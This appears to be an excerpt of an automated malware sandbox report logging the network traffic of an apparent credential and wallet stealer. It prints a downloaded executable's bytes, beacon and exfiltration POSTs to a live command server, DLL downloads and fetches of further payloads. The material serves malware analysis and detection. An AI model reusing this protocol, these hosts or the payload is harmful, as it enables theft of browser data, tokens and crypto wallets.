ab 4f 97 54 df 13 fc 21 b2 07 42 0c da bf 43 98 7c f4 98 0d 9b 5b 05 7b 32 ae 79 e2 92 81 64 3f 31 64 32 a6 6d b5 be 84 92 cf 08 fd 55 35 41 39 fb 33 f1 42 dd 5b 6c d7 74 a6 a7 50 33 66 c5 41 2a 90 79 fb 7a 24 fd 5b 59 69 7f 06 96 ca 88 08 ca e7 11 99 a0 c1 f5 f4 5b e1 e1 76 ea 11 5c b7 1a 42 71 a1 ef 67 11 5e e9 91 ee f9 02 88 70 64 92 93 db 8c c5 7b 04 9f b0 92 74 05 7d e5 79 2a b4 e8 af 5b 50 c8 04 dc 0a 76 07 79 1e 48 07 20 ac e5 40 e7 27 32 e8 5e ab f8 34 dc 68 be b8 37 21 d4 b6 4f 80 77 d5 bc 4a 78 b5 ab 1d 69 e3 9e a4 e8 1a ab 76 a8 14 de b5 3f a1 47 d7 a4 36 5e e7 f9 05 60 ff 71 38 da c2 4e 5a b5 ab 2d 97 54 9a bf 96 75 ef 9a d0 92 f2 57 31 7a 1e 8b a0 fc 01 4b c7 b6 81 5f 9c c1 90 2a ff 16 37 1b 2d cb 1b a1 4
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 03:20:12 GMTContent-Type: application/octet-streamContent-Length: 391072Last-Modified: Tue, 01 Oct 2024 13:44:41 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfcc9-5f7a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 9e 05 00 00 20 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 c0 05 00 00 04 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 be 05 00 00 00 00 00 48 00 00 00 02 00 05 00 40 ab 05 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 db 1f 5b 28 3c d4 73 54 10 77 2f a8 15 ea 9c c3 cd 78 7e 49 a5 1e d7 0f f4 a7 54 1e ec 97 54 35 51 3e d1 7a b9 93 2a f6 a2 f1 a1 62 fc 53 d6 a3 2f 8b 8d 87 8b 32 45 99 77 cb 3e ae a1 2f 8a 64 97 aa 74 5f f0 73 bf b2 97 bd 8e cf 07 88 6f 3e bd e6 ab cd b7 13 b9 e4 eb fd e3 0a ae f5 f0 8f b2 55 56 93 53 f9 99 0d dd bc ef 61 35 eb e4 4a 4b bc b1 bf a2 59 85 77 2e 8e 08 af 13 7f 23 89 17 ab df b4 73 e5 a8 22 b3 f6 7f e6 84 2d 64 04 08 2d 37 8d 9d 61 76 bc f6 6e d7 92 5c d4 09 fb 07 5d a9 df 1e 1e 8d 2e 9b 0a 8f b6 ee c3 4c 1d 14 ea 74 c9 13 ee 3a 32 6f 31 19 21 ad 12 c2 86 c1 f4 2a af fc 71 39 5f 4f b0 fd 06 0b a1 91 4b b3 5e 8d e1 f4 13 22 d3 c8 c3 29 30 da fe 2e 33 b0 92 24 ed 35 89 2c b5 8a 7d cc ff eb e0 9a 33 63 78 f5 7a b3 b5 ab 09 12 32 49 7d c7 fc 17 8f e1 dd d8 98 49 01 65 0a c9 1d 24 f1 84 98 20 2e d2 a0 8f bd d3 56 20 c3 ef 4f 47 80 bb f7 55 61 1e 24 2b d9 0e ef 25 5c 00 42 2d 9a 55 8
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 31 42 38 34 44 35 44 45 44 36 33 33 30 35 32 39 38 33 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="hwid"B41B84D5DED63305298366------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="build"default------GIIEGHIDBGHIECAAECGD--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKJKEHIJECGCBFIJEGIHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 61 36 64 31 35 31 64 36 34 61 65 34 62 35 30 64 34 32 39 31 64 39 65 31 61 32 31 62 63 30 38 39 32 65 32 35 61 34 34 66 36 63 65 61 66 33 35 38 66 37 61 61 34 35 37 63 35 39 64 64 38 36 30 31 34 63 63 37 65 63 34 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 2d 2d 0d 0a Data Ascii: ------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="token"fa6d151d64ae4b50d4291d9e1a21bc0892e25a44f6ceaf358f7aa457c59dd86014cc7ec4------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="message"browsers------FBKJKEHIJECGCBFIJEGI--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFCFBKFCFCBGDGIEGHHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 61 36 64 31 35 31 64 36 34 61 65 34 62 35 30 64 34 32 39 31 64 39 65 31 61 32 31 62 63 30 38 39 32 65 32 35 61 34 34 66 36 63 65 61 66 33 35 38 66 37 61 61 34 35 37 63 35 39 64 64 38 36 30 31 34 63 63 37 65 63 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 2d 2d 0d 0a Data Ascii: ------CGCFCFBKFCFCBGDGIEGHContent-Disposition: form-data; name="token"fa6d151d64ae4b50d4291d9e1a21bc0892e25a44f6ceaf358f7aa457c59dd86014cc7ec4------CGCFCFBKFCFCBGDGIEGHContent-Disposition: form-data; name="message"plugins------CGCFCFBKFCFCBGDGIEGH--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 61 36 64 31 35 31 64 36 34 61 65 34 62 35 30 64 34 32 39 31 64 39 65 31 61 32 31 62 63 30 38 39 32 65 32 35 61 34 34 66 36 63 65 61 66 33 35 38 66 37 61 61 34 35 37 63 35 39 64 64 38 36 30 31 34 63 63 37 65 63 34 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 2d 2d 0d 0a Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"fa6d151d64ae4b50d4291d9e1a21bc0892e25a44f6ceaf358f7aa457c59dd86014cc7ec4------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="message"fplugins------DGIJEGHDAECAKECAFCAK--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAKHost: 46.8.231.109Content-Length: 5623Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCFBGCBFHJECBGDAKKHost: 46.8.231.109Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKFBKKECFHJKEBKEHIHost: 46.8.231.109Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKJKEHIJECGCBFIJEGIHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 61 36 64 31 35 31 64 36 34 61 65 34 62 35 30 64 34 32 39 31 64 39 65 31 61 32 31 62 63 30 38 39 32 65 32 35 61 34 34 66 36 63 65 61 66 33 35 38 66 37 61 61 34 35 37 63 35 39 64 64 38 36 30 31 34 63 63 37 65 63 34 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 2d 2d 0d 0a Data Ascii: ------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="token"fa6d151d64ae4b50d4291d9e1a21bc0892e25a44f6ceaf358f7aa457c59dd86014cc7ec4------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="file"------FBKJKEHIJECGCBFIJEGI--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 61 36 64 31 35 31 64 36 34 61 65 34 62 35 30 64 34 32 39 31 64 39 65 31 61 32 31 62 63 30 38 39 32 65 32 35 61 34 34 66 36 63 65 61 66 33 35 38 66 37 61 61 34 35 37 63 35 39 64 64 38 36 30 31 34 63 63 37 65 63 34 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 2d 2d 0d 0a Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"fa6d151d64ae4b50d4291d9e1a21bc0892e25a44f6ceaf358f7aa457c59dd86014cc7ec4------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="file"------DAAFBAKECAEGCBFIEGDG--
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIHost: 46.8.231.109Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 61 36 64 31 35 31 64 36 34 61 65 34 62 35 30 64 34 32 39 31 64 39 65 31 61 32 31 62 63 30 38 39 32 65 32 35 61 34 34 66 36 63 65 61 66 33 35 38 66 37 61 61 34 35 37 63 35 39 64 64 38 36 30 31 34 63 63 37 65 63 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 2d 2d 0d 0a Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"fa6d151d64ae4b50d4291d9e1a21bc0892e25a44f6ceaf358f7aa457c59dd86014cc7ec4------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="message"wallets------KEBGHCBAEGDHIDGCBAEC--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 61 36 64 31 35 31 64 36 34 61 65 34 62 35 30 64 34 32 39 31 64 39 65 31 61 32 31 62 63 30 38 39 32 65 32 35 61 34 34 66 36 63 65 61 66 33 35 38 66 37 61 61 34 35 37 63 35 39 64 64 38 36 30 31 34 63 63 37 65 63 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 2d 2d 0d 0a Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"fa6d151d64ae4b50d4291d9e1a21bc0892e25a44f6ceaf358f7aa457c59dd86014cc7ec4------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="message"files------BFIIEHJDBKJKECBFHDGH--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIDGCAFCBAAAAAFHDAHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 49 44 47 43 41 46 43 42 41 41 41 41 41 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 61 36 64 31 35 31 64 36 34 61 65 34 62 35 30 64 34 32 39 31 64 39 65 31 61 32 31 62 63 30 38 39 32 65 32 35 61 34 34 66 36 63 65 61 66 33 35 38 66 37 61 61 34 35 37 63 35 39 64 64 38 36 30 31 34 63 63 37 65 63 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 44 47 43 41 46 43 42 41 41 41 41 41 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 44 47 43 41 46 43 42 41 41 41 41 41 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 44 47 43 41 46 43 42 41 41 41 41 41 46 48 44 41 2d 2d 0d 0a Data Ascii: ------BGHIDGCAFCBAAAAAFHDAContent-Disposition: form-data; name="token"fa6d151d64ae4b50d4291d9e1a21bc0892e25a44f6ceaf358f7aa457c59dd86014cc7ec4------BGHIDGCAFCBAAAAAFHDAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BGHIDGCAFCBAAAAAFHDAContent-Disposition: form-data; name="file"------BGHIDGCAFCBAAAAAFHDA--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJKFCBKKJDGDHIDBGIHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 61 36 64 31 35 31 64 36 34 61 65 34 62 35 30 64 34 32 39 31 64 39 65 31 61 32 31 62 63 30 38 39 32 65 32 35 61 34 34 66 36 63 65 61 66 33 35 38 66 37 61 61 34 35 37 63 35 39 64 64 38 36 30 31 34 63 63 37 65 63 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 2d 2d 0d 0a Data Ascii: ------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="token"fa6d151d64ae4b50d4291d9e1a21bc0892e25a44f6ceaf358f7aa457c59dd86014cc7ec4------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="message"ybncbhylepme------KJKJKFCBKKJDGDHIDBGI--
Source: global traffic HTTP traffic detected: GET /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIIDAFIDGCFHJJDGDAHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 61 36 64 31 35 31 64 36 34 61 65 34 62 35 30 64 34 32 39 31 64 39 65 31 61 32 31 62 63 30 38 39 32 65 32 35 61 34 34 66 36 63 65 61 66 33 35 38 66 37 61 61 34 35 37 63 35 39 64 64 38 36 30 31 34 63 63 37 65 63 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 2d 2d 0d 0a Data Ascii: ------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="token"fa6d151d64ae4b50d4291d9e1a21bc0892e25a44f6ceaf358f7aa457c59dd86014cc7ec4------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDHIIDAFIDGCFHJJDGDA--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 46.8.231.109 46.8.231.109
Source: Joe Sandbox View IP Address: 49.12.197.9 49.12.197.9
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
